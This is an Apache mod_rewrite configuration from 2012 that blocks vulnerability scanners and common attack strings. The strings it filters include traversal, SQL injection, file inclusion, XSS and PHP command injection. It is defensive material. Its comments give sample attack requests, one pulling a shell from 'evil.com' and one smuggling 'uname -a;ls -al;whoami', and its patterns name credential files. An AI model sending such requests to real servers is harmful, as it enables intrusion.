# Hardened Apache Mod_Rewrite Security Rule # Provided by Aung Khant, http://yehg.net # Last Updated: 5/13/2012, # Get the latest update from http://yehg.net/lab/#tools.security # Direct URL: http://yehg.net/lab/pr0js/misc/modrewrite-securityrule.php # Note: You must experiment which strings make access denied in normal clean traffic. Remove such rules by testing line by line # Contact support at yehg.net if you need help with tuning this rule. # Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond # NC = 'nocase|NC' (no case-sensitive) # OR = 'ornext|OR' (or next condition) # L = last rule RewriteEngine on # Allow only GET and POST verbs # 'Coz most vul scanners use HEAD for hunting buggy files existence RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR] # Ban Non-GUI Browsers RewriteCond %{HTTP_USER_AGENT} ^.*(lynx|wget).* [NC,OR] # Ban Typical Vulnerability Scanners and others RewriteCond %{HTTP_USER_AGENT} ^()$ [NC,OR] # void of UserAgent # Known Web vulnerabilty Scanners RewriteCond %{HTTP_USER_AGENT} ^.*(syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto).* [NC,OR] # Random Underground Web Exploit Scanners RewriteCond %{HTTP_USER_AGENT} ^.*(javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|fuck|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r).* [NC,OR] # Denial-of-Service Tool RewriteCond %{HTTP_USER_AGENT} ^.*(ApacheBench).* [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^.*(WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR] # Disable access to cgi-bins if not used RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR] # Block out common attack strings # Additional filtering can be put into # HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,HTTP_FORWARDED,HTTP_ACCEPT # Directory Traversal, Null Byte Injection, HTTP Response Splitting RewriteCond %{QUERY_STRING} ^.*(\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR] # SQL Injection Probing RewriteCond %{QUERY_STRING} ^.*(\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/).* [NC,OR] RewriteCond %{QUERY_STRING} ^.*(or|and)%20([0-9]=[0-9]).* [NC,OR] # Remote/Local File Inclusion # RFI: yoursite.com/?pg=http://evil.com/shell.txt? # LFI: yoursite.com/?pg=/logs/access_log? RewriteCond %{QUERY_STRING} .*(=https|=http|=ftp)(://|%3a%2f%2f).*\?$ [NC,OR] RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini).* [NC,OR] # PHP Version Probing RewriteCond %{QUERY_STRING} ^(=PHP).* [NC,OR] # XSS Probing RewriteCond %{QUERY_STRING} ^.*(\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} ^.*(/XSS/).* [NC,OR] # PHP GLOBALS Overriding RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR] # PHP REQUEST variable Overriding RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR] # PHP Command Injection Probing # vuln.php?exec=uname -a;ls -al;whoami RewriteCond %{QUERY_STRING} ^.*(=|;)(uname%20-|ls%20-|whoami).* [NC,OR] # PHP CGI code execution RewriteCond %{QUERY_STRING} ^[^=]*$ [OR] RewriteCond %{QUERY_STRING} %2d|\- # Deny access RewriteRule ^(.*)$ /path/to/friendly_errror.php [F,L]